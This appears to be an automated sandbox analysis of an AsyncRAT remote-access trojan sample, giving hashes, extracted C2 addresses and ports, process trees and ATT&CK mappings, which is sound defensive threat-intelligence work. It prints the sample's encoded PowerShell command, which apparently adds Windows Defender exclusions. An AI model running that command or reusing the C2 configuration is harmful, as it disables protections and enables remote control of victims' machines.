Overview

overview

10

Static

static

3

10fe9e0b3b...e1.exe

windows7-x64

10

10fe9e0b3b...e1.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    18-06-2024 15:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    10fe9e0b3b861a06727addb3e0291727bdd8cd91bebbed4b3d6bc901aa15dde1.exe

  • Size

    2.7MB

  • MD5

    35e31d508c28c89153ef55ffe8c8ba53

  • SHA1

    c74bd105dcac27193f9b432a8a45719b5bb60de1

  • SHA256

    10fe9e0b3b861a06727addb3e0291727bdd8cd91bebbed4b3d6bc901aa15dde1

  • SHA512

    9a953f9ea56fdf5858fda761d3e44bc825a33f489b2a2d09aff438f94eae0e299cc15280b9c716024319d153e872e9e5449f47d0ce8bcec7e07f635590c511b0

  • SSDEEP

    49152:xiv9XkAV5nN1nCz+QBprbMG8zFOnRPXXeqwlG9nFRW7NMJwBgJT:sVR5d2+OpMGtRvezliGCGBgt

Score
10/10
asyncratdefaultexecutionpersistencerat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

95.211.208.153:6606

95.211.208.153:7707

95.211.208.153:8808

5512.sytes.net:6606

5512.sytes.net:7707

5512.sytes.net:8808
Mutex

Llg9a02PERRO

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\10fe9e0b3b861a06727addb3e0291727bdd8cd91bebbed4b3d6bc901aa15dde1.exe
    "C:\Users\Admin\AppData\Local\Temp\10fe9e0b3b861a06727addb3e0291727bdd8cd91bebbed4b3d6bc901aa15dde1.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1636
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdgB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAcwB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAZABuACMAPgA="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2788
    • C:\Users\Admin\AppData\Local\Temp\Zcsbaibfhun.exe
      "C:\Users\Admin\AppData\Local\Temp\Zcsbaibfhun.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3068
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        3⤵
          PID:1352
      • C:\Users\Admin\AppData\Local\Temp\LicGen.exe
        "C:\Users\Admin\AppData\Local\Temp\LicGen.exe"
        2⤵
        • Executes dropped EXE
        PID:2680

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Resource Development

    Reconnaissance

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • \Users\Admin\AppData\Local\Temp\LicGen.exe
      Filesize

      334KB

      MD5

      63404fb2f5a0d14e7a19fa3e4b8af577

      SHA1

      12d4ecfcfe8f9fa53fbc4f7addb43ab118da8255

      SHA256

      d599ed299630b163afb1aa64f6f5bdd92969dd9abfca1e32d1df4a93608fefeb

      SHA512

      19aae9580fa9be4c14401f144f04366a1c21cb9c9ae268a4e75f9e0364f49e9e18242ec0f49c7ec349328530b960b3890e1197d417db9986c763e098844e7416

      Download Submit
    • \Users\Admin\AppData\Local\Temp\Zcsbaibfhun.exe
      Filesize

      2.4MB

      MD5

      5870c41c149fdd038336b2a1b2103e2f

      SHA1

      d3efce3cc94fb928113481aee8d58cdeea24a708

      SHA256

      9b489f300c3797e9d343a47ecd96e83646a61b02c28b5e68071d26a5a666c929

      SHA512

      9fdbc2281e54dc640e8b2598faedabffe70f3fc739d88a603c0d43a8496fc08b07fcebd63fabd11d69c3393edb28eec867ab505a5c694ebe17632d04fe8952a7

      Download Submit
    • memory/1352-4922-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

      Download
    • memory/1636-12-0x0000000003150000-0x000000000322D000-memory.dmp
      Filesize

      884KB

      Download
    • memory/2680-14-0x0000000000400000-0x00000000004DD000-memory.dmp
      Filesize

      884KB

      Download
    • memory/2680-4925-0x0000000000400000-0x00000000004DD000-memory.dmp
      Filesize

      884KB

      Download
    • memory/3068-49-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-57-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-25-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-23-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-21-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-20-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-29-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-31-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-33-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-35-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-37-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-39-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-41-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-43-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-45-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-47-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-19-0x0000000006290000-0x00000000064B2000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-53-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-55-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-27-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-61-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-65-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-67-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-71-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-75-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-81-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-51-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-4907-0x00000000047D0000-0x000000000481C000-memory.dmp
      Filesize

      304KB

      Download
    • memory/3068-4906-0x0000000002060000-0x00000000020BC000-memory.dmp
      Filesize

      368KB

      Download
    • memory/3068-83-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-79-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-77-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-73-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-69-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-63-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-59-0x0000000006290000-0x00000000064AC000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-4908-0x0000000004960000-0x00000000049B4000-memory.dmp
      Filesize

      336KB

      Download
    • memory/3068-18-0x0000000004F40000-0x0000000005160000-memory.dmp
      Filesize

      2.1MB

      Download
    • memory/3068-17-0x00000000001F0000-0x0000000000452000-memory.dmp
      Filesize

      2.4MB

      Download